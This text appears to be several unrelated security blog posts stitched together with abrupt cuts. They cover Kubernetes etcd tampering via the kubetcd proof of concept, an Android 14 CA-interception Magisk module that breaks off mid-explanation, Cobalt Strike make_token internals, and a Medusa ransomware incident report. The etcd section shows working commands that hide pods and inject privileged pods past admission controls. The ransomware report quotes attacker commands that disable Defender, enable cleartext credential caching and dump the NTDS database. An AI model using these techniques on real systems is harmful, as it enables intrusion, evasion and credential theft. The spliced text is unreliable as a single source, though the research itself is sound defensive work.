kubelet: An agent running on each node, responsible for keeping the pods running and in a healthy state.
kube-proxy: Exposes services running on pods to the network.
When considering the attack surface in Kubernetes, we tend to think of unauthenticated components, such as the kube-apiserver and kubelet, of leaked tokens or credentials that grant access to certain cluster features, and of non-hardened containers that may provide access to the underlying host. Etcd, by contrast, is often perceived solely as an information storage element within the cluster from which secrets can be extracted. However, etcd is much more than that.
What is etcd and how does it work?
Etcd, which is an external project to the core of Kubernetes, is a non-relational key-value database that stores all the information about the cluster, including pods, deployments, network policies, roles, and more. In fact, when performing a cluster backup, what is actually done is a dump of etcd, and during a restore operation, this is also done through this component. Given its critical role in the Kubernetes architecture, can’t we use it for more than just extracting secrets?
Its function as a key-value database is straightforward. Entries can be added or edited using the put command, the value of keys can be retrieved using get, deletions can be performed using delete, and a directory tree structure can be created:
$ etcdctl put /key1 value1
OK
$ etcdctl put /folder1/key1 value2
OK
$ etcdctl get / --prefix --keys-only
/folder1/key1
/key1
$ etcdctl get /folder1/key1
/folder1/key1
value2
How Kubernetes uses etcd: Protobuf
While the operation of etcd is relatively straightforward, let’s take a look at how Kubernetes injects its resources into the database, such as a pod. Let’s create a pod and extract its entry from etcd:
As you can see, the data extracted from the pod in etcd is not just alphanumeric characters. This is because Kubernetes serialises the data using protobuf.
Protobuf, short for Protocol Buffers, is a data serialisation format developed by Google that is independent of programming languages. It enables efficient communication and data exchange between different systems. Protobuf uses a schema or protocol definition to define the structure of the serialised data. This schema is defined using a simple language called the Protocol Buffer Language.
For example, let’s consider a protobuf message to represent data about a person. We would define the structure of the protobuf message as follows:
syntax = "proto3";
message Person {
string name = 1;
int32 age = 2;
string email = 3;
}
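To make the wire format concrete, the fragment below hand-encodes this Person message in Python. Protobuf emits each field as a tag byte (the field number shifted left by 3, ORed with the wire type) followed by a varint (for int32) or a length-prefixed byte string:

```python
def encode_varint(n: int) -> bytes:
    # Protobuf varints: 7 payload bits per byte, MSB set on all but the last.
    out = bytearray()
    while True:
        b = n & 0x7F
        n >>= 7
        out.append(b | (0x80 if n else 0))
        if not n:
            return bytes(out)

def encode_person(name: str, age: int, email: str) -> bytes:
    name_b, email_b = name.encode(), email.encode()
    msg = bytearray()
    msg += b"\x0a" + encode_varint(len(name_b)) + name_b    # field 1, wire type 2
    msg += b"\x10" + encode_varint(age)                     # field 2, wire type 0
    msg += b"\x1a" + encode_varint(len(email_b)) + email_b  # field 3, wire type 2
    return bytes(msg)
```

This is why the raw etcd entries look mostly binary: field names never appear on the wire, only numeric tags and values, so the schema is required to interpret them.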
If we wanted to serialise other types of data, such as car or book data, the parameters required to define them would be different to those required to define a person. The same principle is true for Kubernetes. In Kubernetes, multiple resources can be defined, such as pods, roles, network policies, and namespaces, among others. While they share a common structure, not all of them can be serialised in the same way, as they require different parameters and definitions. Therefore, different schemas are required to serialise these different objects.
Fortunately, there is auger, an application developed by Joe Betz, a technical staff member at Google. Auger collects the Kubernetes source code and all the schemas, allowing the serialisation and deserialisation of data stored in etcd into YAML and JSON formats. At NCC Group, we have created a wrapper for auger called kubetcd to demonstrate the potential criticality of a compromised etcd through a proof of concept (PoC).
Limitations
As a post-exploitation technique, this approach has several limitations. The first and most obvious is that we need to have compromised the host running the etcd service as root. This is necessary because we need access to the following certificates in order to authenticate to the etcd service, which is typically only exposed on localhost. The default paths used by most installation scripts are:
/etc/kubernetes/pki/etcd/ca.crt
/etc/kubernetes/pki/etcd/server.crt
/etc/kubernetes/pki/etcd/server.key (this is only readable by root)
A second limitation is that we would need to have the desired items already present in the cluster in order to use them as templates, especially for those that execute, such as pods. This is necessary because there is execution metadata that is added once the build request has passed through the kube-apiserver, and occasionally there is third-party data (e.g. Calico) that is not typically included in a raw manifest.
The third and final limitation is that this technique is only applicable to self-managed environments, which can include on-premises or virtual instances in the cloud. Cloud providers that offer managed Kubernetes are responsible for managing and securing the control plane, which means that access to not only etcd but also the scheduler or control manager is restricted and users cannot interact with them. Therefore, this technique is not suitable for managed environments.
Injecting resources and tampering data
Recognising that data entry is done through serialisation with protobuf using different schemas, the kubetcd wrapper aims to emulate the typical syntax of the native kubectl client. However, when interacting directly with etcd, many fields that are managed by the logic of the kube-apiserver can be modified without restriction. A simple example would be the timestamp, which indicates the creation date and time of a pod:
root@kind-control-plane:/# kubectl get pods
NAME READY STATUS RESTARTS AGE
nginx 1/1 Running 0 38s
root@kind-control-plane:/# kubetcd create pod nginx -t nginx --time 2000-01-31T00:00:00Z
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Path injected: /registry/pods/default/nginx
OK
root@kind-control-plane:/# kubectl get pods
NAME READY STATUS RESTARTS AGE
nginx 1/1 Running 0 23y
Changing the timestamp of a newly created Pod would help to make it appear, beyond what is shown in the event logs, as if it had been running in the cluster for a certain period of time. This could give any administrator pause as to whether it would be appropriate to delete it or whether it would affect any services.
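Conceptually, the tampering step is just deserialise, edit, re-serialise. The toy below uses JSON as a stand-in for the protobuf encoding that auger/kubetcd actually handle:

```python
import json

def backdate_pod(manifest_json: str, new_timestamp: str) -> str:
    # Deserialise the stored object, rewrite metadata.creationTimestamp
    # (a field the kube-apiserver would normally control), re-serialise.
    pod = json.loads(manifest_json)
    pod["metadata"]["creationTimestamp"] = new_timestamp
    return json.dumps(pod)

stored = json.dumps({"kind": "Pod",
                     "metadata": {"name": "nginx",
                                  "creationTimestamp": "2023-05-23T10:20:22Z"}})
tampered = backdate_pod(stored, "2000-01-31T00:00:00Z")
```

kubetcd performs the same three steps against the real protobuf-encoded entry, which is why the kubectl output above reports an age of 23 years.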
Persistence
Now that we know we can tamper with the startup date of a pod, we can explore modifying other parameters, such as changing the path in etcd to gain persistence in the cluster. When we create a pod named X, it is injected into etcd at the path /registry/pods/<namespace>/X. However, with direct access to etcd, we can make the pod name and its path in the database not match, which will prevent it from being deleted by the kube-apiserver:
root@kind-control-plane:/# kubetcd create pod nginxpersistent -t nginx -p randomentry
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Path injected: /registry/pods/default/randomentry
OK
root@kind-control-plane:/# kubectl get pods
NAME READY STATUS RESTARTS AGE
nginx 1/1 Running 0 23y
nginxpersistent 1/1 Running 0 23y
root@kind-control-plane:/# kubectl delete pod nginxpersistent
Error from server (NotFound): pods "nginxpersistent" not found
Taking this a step further, it is possible to create inconsistencies in pods by manipulating not only the pod name, but also the namespace. By running pods in a namespace that does not match the entry in etcd, we can make them semi-hidden and difficult to identify or manage effectively:
root@kind-control-plane:/# kubetcd create pod nginx_hidden -t nginx -n invisible --fake-ns
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Path injected: /registry/pods/invisible/nginx_hidden
OK
Note that with --fake-ns, the invisible namespace is only used for the etcd injection path, but the default namespace has not been replaced in its manifest. Because of this inconsistency, the pod will not appear when listing the default namespace, and the invisible namespace will not be indexed. This pod will only appear when all resources are listed using --all or -A:
root@kind-control-plane:/# kubectl get pods
NAME READY STATUS RESTARTS AGE
nginx 1/1 Running 0 23y
nginxpersistent 1/1 Running 0 23y
root@kind-control-plane:/# kubectl get namespaces
NAME STATUS AGE
default Active 13m
kube-node-lease Active 13m
kube-public Active 13m
kube-system Active 13m
local-path-storage Active 13m
root@kind-control-plane:/# kubectl get pods -A | grep hidden
default nginx_hidden 1/1 Running 0 23y
By manipulating the namespace entry in etcd, we can create pods that appear to run in one namespace, but are actually associated with a different namespace defined in their manifest. This can cause confusion and make it difficult for administrators to accurately track and manage pods within the cluster.
These are just a few basic examples of directly modifying data in etcd, specifically in relation to pods. However, the possibilities and combinations of these techniques can lead to other interesting scenarios.
Bypassing AdmissionControllers
Kubernetes includes several elements for cluster hardening, specifically for pods and their containers. The most notable elements are:
SecurityContext, which allows, among other things, preventing a pod from running as root, mounting filesystems in read-only mode, or blocking capabilities.
Seccomp, which is applied at the node level and restricts or enables certain syscalls.
AppArmor, which provides more granular syscall management than Seccomp.
However, all of these hardening features may require policies to enforce their use, and this is where Admission Controllers come into play. There are several types of built-in admission controllers, and custom ones can also be created, known as webhook admission controllers. Whether built-in or webhook, they can be of two types:
Validation: They accept or deny the deployment of a resource based on the defined policy. For example, the NamespaceExists Admission Controller denies the creation of a resource if the specified namespace does not exist.
Mutation: These modify the resource and the cluster to allow its deployment. For example, the NamespaceAutoProvision Admission Controller checks resource requests to be deployed in a namespace and creates the namespace if it does not exist.
There is a built-in validating Admission Controller that enforces the deployment of hardened pods, known as Pod Security Admission (PSA). This Admission Controller supports three predefined levels of security, known as the Pod Security Standards, which are detailed in the official Kubernetes documentation. In summary, they are as follows:
Privileged: No restrictions. A pod deployed under this policy retains all the permissions needed to perform a pod breakout.
Baseline: This policy applies a minimum set of hardening rules, such as restricting the use of host-shared namespaces, using AppArmor, or allowing only a subset of capabilities.
Restricted: This is the most restrictive policy and applies almost all available hardening options.
PSAs replace the obsolete Pod Security Policies (PSP) and are applied at the namespace level, so all pods deployed in a namespace where these policies are defined are subject to the configured pod security standard.
It is worth noting that these PSAs apply equally to all roles, so even a cluster admin cannot circumvent these restrictions without recreating the namespace with the policies disabled:
root@kind-control-plane:/# kubectl get ns restricted-ns -o yaml
apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: "2023-05-23T10:20:22Z"
labels:
kubernetes.io/metadata.name: restricted-ns
pod-security.kubernetes.io/audit: restricted
pod-security.kubernetes.io/enforce: restricted
pod-security.kubernetes.io/warn: restricted
name: restricted-ns
resourceVersion: "3710"
uid: 2277ebac-e487-4d59-8a09-97bef27cc0d9
spec:
finalizers:
- kubernetes
status:
phase: Active
root@kind-control-plane:/# kubectl run nginx --image nginx -n restricted-ns
Error from server (Forbidden): pods "nginx" is forbidden: violates PodSecurity "restricted:latest": allowPrivilegeEscalation != false (container "nginx" must set securityContext.allowPrivilegeEscalation=false), unrestricted capabilities (container "nginx" must set securityContext.capabilities.drop=["ALL"]), runAsNonRoot != true (pod or container "nginx" must set securityContext.runAsNonRoot=true), seccompProfile (pod or container "nginx" must set securityContext.seccompProfile.type to "RuntimeDefault" or "Localhost")
As expected, not even a cluster administrator is allowed to deploy a pod without meeting all the security requirements imposed by the PSA. However, it is possible to inject privileged pods into namespaces restricted by PSAs using etcd:
root@kind-control-plane:/# kubetcd create pod nginx_privileged -t nginx -n restricted-ns -P
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Privileged SecurityContext Added
Path injected: /registry/pods/restricted-ns/nginx_privileged
OK
root@kind-control-plane:/# kubectl get pods -n restricted-ns
NAME READY STATUS RESTARTS AGE
nginx_privileged 1/1 Running 0 23y
root@kind-control-plane:/# kubectl get pod nginx_privileged -n restricted-ns -o yaml | grep "restricted\\|privileged:"
namespace: restricted-ns
privileged: true
With the ability to deploy unrestricted privileged pods, it would be easy to get a shell on the underlying node. This demonstrates that gaining write access to an etcd node (whether deployed as a pod within the cluster, as a local service on the control plane, or as an isolated node in a dedicated etcd cluster) could compromise the Kubernetes cluster and all its underlying infrastructure.
Why does this work?
When working with the regular client, kubectl, it sends all requests directly to the kube-apiserver, where processes are executed in the following order: authentication, authorisation and Admission Controllers. Once the request has been authenticated, authorised and filtered through the admission controllers, the kube-apiserver redirects the request to the other components of the cluster to organise the provisioning of the desired resource. In other words, the kube-apiserver is not only the entry point to the cluster, but also applies all the controls for accessing it.
However, by injecting these resources directly into etcd, we bypass all of these controls: the resource never travels from a client through the kube-apiserver, but appears directly in the backend database where the cluster state is stored. As currently designed, Kubernetes places trust in etcd, assuming that if an element is already in the database, it has already passed all the controls imposed by the kube-apiserver.
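The control-flow difference can be sketched in a few lines of illustrative Python (all function names are ours, and the admission check is a crude stand-in for Pod Security Admission): the API server path runs authentication, authorisation and admission before persisting, while a direct etcd write goes straight to the store.

```python
store = {}  # stand-in for the etcd backend

def admission(pod):
    # Crude stand-in for a validating admission controller (e.g. PSA)
    if pod.get("privileged"):
        raise PermissionError("violates PodSecurity 'restricted'")

def apiserver_create(pod):
    # In a real cluster, authentication and authorisation happen first,
    # then admission controllers, and only then is the object persisted.
    admission(pod)
    store[f"/registry/pods/{pod['ns']}/{pod['name']}"] = pod

def etcd_write(pod):
    # Direct backend write: no authn, authz or admission at all.
    store[f"/registry/pods/{pod['ns']}/{pod['name']}"] = pod

bad = {"name": "nginx_privileged", "ns": "restricted-ns", "privileged": True}

try:
    apiserver_create(bad)
except PermissionError as err:
    print("apiserver rejected:", err)

etcd_write(bad)  # accepted: the cluster trusts whatever is in the store
print("/registry/pods/restricted-ns/nginx_privileged" in store)
```

The same object that the front door rejects is happily served once it exists in the backend, which is exactly the trust assumption the technique abuses.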
Mitigating the threat
Despite the capabilities of this post-exploitation technique, it would be easily detectable, mainly by third-party runtime security solutions that run at the node level and have good log-ingestion times, such as Falco or some EDRs, especially if we seek to obtain shells on the nodes.
However, as already demonstrated, gaining access to the nodes would be a simple task, and since most container engines run as root by default, with user namespaces disabled, we would get a direct root shell in most cases. This would allow us to manipulate host services and processes, be they EDRs or log-forwarding agents. Enabling user namespaces, using container sandboxing technologies, or running the container engine in rootless mode could help mitigate this attack vector.
Conclusions
The state-of-the-art regarding the attack surface in a Kubernetes cluster has been defined for some time, focusing on elements such as unauthenticated kube-apiserver or kubelet services, leaked tokens or credentials, and various pod breakout techniques. Most of the techniques described so far in relation to etcd have focused primarily on the extraction of secrets and the lack of encryption of data at rest.
This paper aims to demonstrate that a compromised etcd is the most critical element within the cluster, as it is subject to neither role restrictions nor Admission Controllers. This makes it easy to compromise not only the cluster itself, but also its underlying infrastructure, including all the nodes on which a kubelet is deployed.
This should make us rethink the implementation of etcd and its reliability within the cluster by implementing additional mechanisms that ensure data integrity.
Android 14 introduced a new feature that allows CA certificates to be installed remotely. With this change, instead of using the /system/etc/security/cacerts directory to check trusted CAs, the system uses the com.android.conscrypt APEX module and reads the certificates from the directory /apex/com.android.conscrypt/cacerts.
Inspired by this blog post by Tim Perry, I decided to create a Magisk module that automates the work required to intercept traffic on Android 14 with tooling such as Burp Suite, and that uses the installed user certificates in a similar fashion to the MagiskTrustUserCerts module.
This Magisk module makes all installed user CAs part of the Conscrypt APEX module's CA certificates, so that they are automatically used when building the trust chain on Android 14.
Note: if an application has implemented SSL pinning, it will not be possible to intercept its HTTPS traffic.
APEX: A quick overview
The Android Pony EXpress (APEX) container format was introduced in Android 10 and it is used in the install flow for lower-level system modules. This format facilitates the updates of system components that do not fit into the standard Android application model. Some example components are native services and libraries, hardware abstraction layers (HALs), runtime (ART), and class libraries.
With the introduction of APEX, system libraries in Android can be updated individually like Android apps. The main benefit of this is that system components can be individually updated via the Android Package Manager instead of having to wait for a full system update.
The Conscrypt module (com.android.conscrypt) is distributed as an APEX file and is used as a Java Security Provider. On Android 14, an updatable root trust store has been introduced within Conscrypt. This allows for faster CA updates, making it possible to revoke trust in problematic or compromised CAs across all Android 14 devices.
The script that appears on Tim Perry’s blog post was used as the template for the module, but some modifications were required in order to use it as a Magisk module.
In Magisk, boot scripts can run in two different modes: post-fs-data and late_start service mode. Because the Zygote process needs to have started, the boot script is set to run in late_start service mode.
To ensure the boot process had completed before mounting our CA certificates over the Conscrypt directory inside Zygote's mount namespace, the script polls the system property sys.boot_completed, which is set to 1 once the whole boot process has finished.
The following piece of code was added at the beginning of the script:
while [ "$(getprop sys.boot_completed)" != 1 ]; do
/system/bin/sleep 1s
done
The script was also modified to use the user-installed CAs with the following code:
In his post, the author explains how the Windows program runas works and how the netonly flag allows the creation of processes where the local identity differs from the network identity (the local identity remains the same, while the network identity is represented by the credentials supplied to runas).
Cobalt Strike provides the make_token command to achieve a similar result to runas /netonly.
If you are familiar with this command, you have likely experienced situations in which processes created by Beacon do not “inherit” the new token properly. The inner workings of this command are fairly obscure, and searching Google for something like “make_token cobalt strike” does not provide much valuable information (in fact, it is far more useful to analyse the implementations of other frameworks such as Sliver or Covenant).
“If you are in a privileged context, you can use make_token in Beacon to create an access token with credentials”
“The problem with make_token, as much as steal_token, is it requires you to be in an administrator context before you can actually do anything with that token”
Even though the description does not mention it, Raphael states that make_token requires an administrative context. However, if we go ahead and use the command with a non-privileged user… it works! What are we missing here?
This post aims to shed more light on how the make_token command works, as well as its capabilities and limitations. This information will be useful in situations where you want to impersonate other users through their credentials with the goal of enumerating or moving laterally to remote systems.
It’s important to note that, even though we are discussing Cobalt Strike, this knowledge is perfectly applicable to any modern C2 framework. In fact, for the purposes of this post, we took advantage of the fact that Meterpreter did not have a make_token module to implement it ourselves.
An example of the new post/windows/manage/make_token module can be seen below:
You can find more information about our implementation in the following links:
Let’s begin with some theory about Windows authentication. This will help in understanding how make_token works under the hood and addressing the questions raised in the introduction.
Local Security Context vs. Network Security Context
Let’s consider a scenario where our user is capsule.corp\yamcha and we want to interact with a remote system to which only capsule.corp\bulma has access. In this example, we have Bulma’s password, but the account is affected by a deny logon policy in our current system.
If we attempt to run a cmd.exe process with runas using Bulma’s credentials, the result will be something like this:
The netonly flag is intended for these scenarios. With this flag we can create a process where we remain Yamcha at the local level, while we become Bulma at the network level, allowing us to interact with the remote system.
In this example, Yamcha and Bulma were users from the same domain, and we could circumvent the deny-logon policy by using the netonly flag. This flag is also very handy in situations where you have credentials belonging to a local user from a remote system, or to a domain user from an untrusted domain.
The fundamental thing to understand here is that Windows will not validate the credentials you specify to runas /netonly; it will just make sure they are used when the process interacts with the network. That is why we can bypass deny-logon policies with runas /netonly, and also use credentials belonging to users outside our current system or from untrusted domains.
Now… How does runas manage to create a process where we are one identity in the local system, and another identity in the network?
If we extract the strings of the program, we will see the presence of CreateProcessWithLogonW.
A simple lookup of the function shows that runas is probably using it to create a new process with the credentials specified as arguments.
Reading the documentation, we will find a LOGON_NETCREDENTIALS_ONLY flag which allows the creation of processes in a similar way to what we saw with netonly. We can safely assume that this flag is the one used by runas when we specify /netonly.
The Win32 API provides another function very similar to CreateProcessWithLogonW, but without the process creation logic. This function is called LogonUserA.
LogonUserA is solely responsible for creating a new security context from given credentials. This is the function that make_token leverages and is commonly used along with the LOGON32_LOGON_NEW_CREDENTIALS logon type to create a netonly security context (we can see this in the implementations of open source C2 frameworks).
To understand how it is possible to create a process with two distinct “identities” (local/network), it is fundamental to become familiar with two important components of Windows authentication: logon sessions and access tokens.
Logon Sessions and Access Tokens
When a user authenticates to a Windows system, a process similar to the image below occurs. At a high level, the user’s credentials are validated by the appropriate authentication package, typically Kerberos or NTLM. A new logon session is then created with a unique identifier, and the identifier along with information about the user is sent to the Local Security Authority (LSA) component. Finally, LSA uses this information to create an access token for the user.
Regarding access tokens, they are objects that represent the local security context of an account and are always associated with a process or thread of the system. These objects contain information about the user such as their security identifier, privileges, or the groups to which they belong. Windows performs access control decisions based on the information provided by access tokens and the rules configured in the discretionary access control list (DACL) of target objects.
An example is shown below where two processes – one from Attl4s and one from Wint3r – attempt to read the “passwords.txt” file. As can be seen, the Attl4s process is able to read the file due to the second rule (Attl4s is a member of Administrators), while the Wint3r process is denied access because of the first rule (Wint3r has identifier 1004).
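The access check in that example can be modelled with a short sketch (the SIDs are truncated placeholders of our own, and real DACL evaluation has more rules than this): Windows walks the ACEs in order, and the first entry matching one of the token's identities decides the outcome.

```python
# Simplified first-match DACL evaluation for the "passwords.txt" example.
# ACE order matters: a deny placed before an allow wins for matching users.
dacl = [
    {"type": "deny",  "sid": "S-1-5-...-1004"},  # deny the user with RID 1004 (Wint3r)
    {"type": "allow", "sid": "Administrators"},  # allow members of Administrators
]

def access_check(token_sids):
    """Return True if the first matching ACE grants access, False otherwise."""
    for ace in dacl:
        if ace["sid"] in token_sids:
            return ace["type"] == "allow"
    return False  # implicit deny when no ACE matches

attl4s = {"S-1-5-...-1001", "Administrators"}  # member of Administrators
wint3r = {"S-1-5-...-1004", "Users"}           # RID 1004

print(access_check(attl4s))  # True: matched by the allow ACE
print(access_check(wint3r))  # False: matched by the deny ACE first
```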
Regarding logon sessions, their importance stems from the fact that if an authentication results in cached credentials, they will be associated with a logon session. The purpose of cached credentials is to enable Windows to provide a single sign-on (SSO) experience where the user does not need to re-enter their credentials when accessing a remote service, such as a shared folder on the network.
As an interesting note, when Mimikatz dumps credentials from Windows authentication packages (e.g., sekurlsa::logonpasswords), it iterates through all the logon sessions in the system to extract their information.
The following image illustrates the relationship between processes, tokens, logon sessions, and cached credentials:
The key takeaways are:
Access tokens represent the local security context of an authenticated user. The information in these objects is used by the local system to make access control decisions
Logon sessions with cached credentials represent the network security context of an authenticated user. These credentials are automatically and transparently used by Windows when the user wants to access remote services that support Windows authentication
What runas /netonly and make_token do under the hood is creating an access token similar to the one of the current user (Yamcha) along with a logon session containing the credentials of the alternate user (Bulma). This enables the dual identity behaviour where the local identity remains the same, while the network identity changes to that of the alternate user.
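The dual-identity behaviour can be modelled with a toy sketch (all class and account names are ours; no Win32 calls are involved): the process keeps the caller's token for local access checks, while a fresh logon session carries the alternate credentials used for network authentication.

```python
class NetOnlyProcess:
    """Toy model of a process created with runas /netonly or make_token."""

    def __init__(self, local_user, net_creds):
        self.token_user = local_user          # access token: local identity unchanged
        self.logon_session_creds = net_creds  # logon session: alternate credentials

    def whoami_local(self):
        # Local access control decisions use the access token
        return self.token_user

    def whoami_network(self):
        # Windows transparently uses the session's cached credentials (SSO)
        # when authenticating to remote services
        return self.logon_session_creds[0]

p = NetOnlyProcess("capsule.corp\\yamcha", ("capsule.corp\\bulma", "hunter2"))
print(p.whoami_local())    # capsule.corp\yamcha
print(p.whoami_network())  # capsule.corp\bulma
```

Note that nothing in this model validates the supplied credentials, mirroring the real behaviour discussed below.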
As stated before, the fact that runas /netonly and make_token do not validate credentials has many benefits. For example, we can use credentials for users who have been denied local access, and for accounts that the local system does not know and cannot validate (e.g. a local user from another computer, or an account from an untrusted domain). Additionally, we can create "sacrificial" logon sessions with invalid credentials, which allows us to manipulate Kerberos tickets without overwriting those stored in the original logon session.
However, this lack of validation can also result in unpleasant surprises, for example in the case of a company using an authenticated proxy. If we make a mistake when inserting credentials to make_token, or create sacrificial sessions carelessly, we can end up with locked accounts or losing our Beacon because it is no longer able to exit through the proxy!
Administrative Context or Not!?
Raphael mentioned that, in order to use a token created by make_token, an administrative context was needed.
“The problem with make_token, as much as steal_token, is it requires you to be in an administrator context before you can actually do anything with that token”
Do we really need an administrative context? The truth is there are situations where this statement is not entirely accurate.
As far as we know, the make_token command uses the LogonUserA function (along with the LOGON32_LOGON_NEW_CREDENTIALS flag) to create a new access token similar to that of the user, but linked to a new logon session containing the alternate user’s credentials. The command does not stop there though, as LogonUserA only returns a handle to the new token; we have to do something with that token!
Let’s suppose our goal is to create new processes with the context of the new token.
Creating Processes with a Token
If we review the Windows API, we will spot two functions that support a token handle as an argument to create a new process:
Reading the documentation of these functions, however, will show the following statements:
“Typically, the process that calls the CreateProcessAsUser function must have the SE_INCREASE_QUOTA_NAME privilege and may require the SE_ASSIGNPRIMARYTOKEN_NAME privilege if the token is not assignable.”
“The process that calls CreateProcessWithTokenW must have the SE_IMPERSONATE_NAME privilege.”
This is where Raphael’s statement makes sense. Even if we can create a token with a non-privileged user through LogonUserA, we will not be able to use that token to create new processes. To do so, Microsoft indicates we need administrative privileges such as SE_ASSIGNPRIMARYTOKEN_NAME, SE_INCREASE_QUOTA_NAME or SE_IMPERSONATE_NAME.
When using make_token in a non-privileged context and attempting to create a process (e.g., shell dir \\dc01.capsule.corp\C$), Beacon will silently fail and fall back to ignoring the token when creating the process. That is one of the reasons why it sometimes appears that the impersonation is not working properly.
As a note, agents like Meterpreter do give more information about the failure:
As such, we could rephrase Raphael’s statement as follows:
“The problem with make_token is it requires you to be in an administrator context before you can actually create processes with that token”
The perceptive reader may now wonder… What happens if I operate within my current process instead of creating new ones? Do I still need administrative privileges?
Access Tokens + Thread Impersonation
The Windows API provides functions like ImpersonateLoggedOnUser or SetThreadToken to allow a thread within a process to impersonate the security context provided by an access token.
In addition to keeping the token handle for future process creations, make_token also employs functions like these to acquire the token’s security context in the thread where Beacon is running. Do we need administrative privileges for this? Not at all.
As can be seen in the image below, we meet point number three:
This means that any command or tool executed from the thread where Beacon is running will benefit from the security context created by make_token, without requiring an administrative context. This includes many of the native commands, as well as capabilities implemented as Beacon Object Files (BOFs).
Closing Thoughts
Considering all the information above, we could do a more detailed description of make_token as follows:
The make_token command creates an access token similar to the one of the current user, along with a logon session containing the credentials specified as arguments. This enables a dual identity where nothing changes locally (we remain the same user), but in the network we will be represented by the credentials of the alternate user (note that make_token does not validate the credentials specified). Once the token is created, Beacon impersonates it to benefit from the new security context when running inline capabilities.
The token handle is also stored by Beacon to be used in new process creations, which requires an administrative context. If a process creation is attempted with an unprivileged user, Beacon will ignore the token and fall back to a regular process creation.
As a final note, we would like to point out that in 2019 Raphael Mudge released a new version of his awesome Red Team Ops with Cobalt Strike course. In the eighth video, make_token was once again discussed, but this time showing a demo with an unprivileged user. While this demonstrated that running the command did not require an administrative context, it did not explain much more about it.
We hope this article has answered any questions you may have had about make_token.
Unveiling the Dark Side: A Deep Dive into Active Ransomware Families
Author: Molly Dewis
Intro
Our technical experts have written a blog series focused on Tactics, Techniques and Procedures (TTPs) deployed by four ransomware families recently observed during NCC Group's incident response engagements.
In case you missed it, our last post analysed an Incident Response engagement involving the D0nut extortion group. In this instalment, we take a deeper dive into Medusa ransomware.
Not to be confused with MedusaLocker, Medusa was first observed in 2021 and is a Ransomware-as-a-Service (RaaS) that often uses the double-extortion method for monetary gain. In 2023 the group's activity increased with the launch of the 'Medusa Blog', a platform used to leak data belonging to victims.
Summary
This post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving Medusa Ransomware.
Below is a summary of the findings presented in this blog post:
Use of web shells to maintain access.
Utilising PowerShell to conduct malicious activity.
Dumping password hashes.
Disabling antivirus services.
Use of Windows utilities for discovery activities.
Reverse tunnel for C2.
Data exfiltration.
Deployment of Medusa ransomware.
Medusa
Medusa ransomware is a variant that is believed to have been around since June 2021 [1]. Medusa is an example of double-extortion ransomware, where the threat actor exfiltrates and encrypts data, then threatens to release or sell the victim's data on the dark web if the ransom is not paid. This means the group behind Medusa ransomware can be characterised as financially motivated. Victims of Medusa ransomware come from no particular industry, suggesting the group behind this variant has no issue with harming any organisation.
Incident Overview
Initial access was gained by exploiting an external facing web server. Webshells were created on the server which gave the threat actor access to the environment. From initial access to the execution of the ransomware, a wide variety of activity was observed such as executing Base64 encoded PowerShell commands, dumping password hashes, and disabling antivirus services. Data was exfiltrated and later appeared on the Medusa leak site.
Timeline
T – Initial Access gained via web shells.
T+13 days – Execution activity.
T+16 days – Persistence activity.
T+164 days – Defense Evasion activity.
T+172 days – Persistence and Discovery activity.
T+237 days – Defense Evasion and Credential Access Activity started.
T+271 days – Ransomware Executed.
MITRE TTPs
Initial Access
The threat actor gained initial access by exploiting a vulnerable application hosted by an externally facing web server. Webshells were deployed to gain a foothold in the victim’s environment and maintain access.
Execution
PowerShell was leveraged by the threat actor to conduct various malicious activities, such as:
Deleting files used during the intrusion. Example: powershell.exe -noninteractive -exec bypass del C:\\PRogramdata\\re.exe
Conducting discovery activity. Example: powershell.exe -noninteractive -exec bypass net group domain admins /domain
Windows Management Instrumentation (WMI) was utilised to remotely execute a cmd.exe process: wmic /node:<IP ADDRESS> /user:<DOMAIN\\USER> /password:<REDACTED> process call create 'cmd.exe'.
Scheduled tasks were used to execute c:\\programdata\\a.bat. It is not known exactly what a.bat was used for; however, analysis of a compiled ASPX file revealed the threat actor had used PowerShell to install anydesk.msi.
A cmd.exe process was started with the following argument list: 'c:\\programdata\\a.bat';start-sleep 15;ps AnyDeskMSI
Various services were installed by the threat actor. PDQ Deploy was installed to deploy LAdHW.sys, a kernel driver which disabled antivirus services. Additionally, PSEXESVC.exe was installed on multiple servers. On one server, it was used to modify the firewall to allow WMI connections.
Persistence
Maintaining access to the victim's network was achieved by creating a new user, admin, on the external-facing web server (believed to be the initial access server). Additionally, on the two external-facing web servers, web shells were uploaded to establish persistent access and execute commands remotely. JavaScript-based web shells were present on one web server and the GhostWebShell [2] was found on the other. The GhostWebShell is fileless; however, its compiled versions were saved in C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\<APPLICATION NAME>\<HASH>\<HASH>.
Defence Evasion
Evading detection was one of the aims of this threat actor, given the various defence evasion techniques utilised. Antivirus agents were removed from all affected hosts, including the antivirus server. Microsoft Windows Defender capabilities were disabled by the threat actor using: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;.
Additionally, LAdHW.sys, a signed kernel-mode driver, was installed as a new service to disable antivirus services. The following firewall rule was deleted: powershell.exe -Command "& {Remove-NetFirewallRule -DisplayName \"<Antivirus Agent Firewall Rule Name>\"}".
The threat actor obfuscated their activity. Base64-encoded PowerShell commands were utilised to download malicious executables. It should be noted that many of these executables, such as JAVA64.exe and re.exe, were deleted after use. Additionally, Sophos.exe (see below), which was packed with Themida, was executed.
The value of HKLM\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest\UseLogonCredential was modified to 1 so that logon credentials were stored in cleartext. This enabled the threat actor to conduct credential-dumping activities.
Credential Access
The following credential dumping techniques were utilised by the threat actor:
Using the Nishang payload to dump password hashes. Nishang is a collection of PowerShell scripts and payloads. The Get-PassHashes script, which requires admin privileges, was used.
Mimikatz was present on one of the external facing web servers, named as trust.exe. A file named m.txt was identified within C:\Users\admin\Desktop, the same location as the Mimikatz executable.
An LSASS memory dump was created using the built-in Windows tool, comsvcs.dll.
The built-in Windows tool ntdsutil.exe was used to extract the NTDS database:
powershell ntdsutil.exe ‘ac i ntds’ ‘ifm’ ‘create full c:\programdata\nt’ q q
Discovery
